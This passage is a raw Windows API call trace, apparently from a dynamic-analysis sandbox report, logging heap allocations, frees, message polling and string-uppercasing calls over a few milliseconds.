lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.982] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.982] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.982] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.983] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.983] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.983] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.983] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.983] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0257.986] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.986] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.986] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.986] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.986] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.987] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.987] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.988] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.988] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.988] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.988] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.991] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.991] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.991] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.991] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.992] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.992] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.992] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.992] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.992] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.993] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: 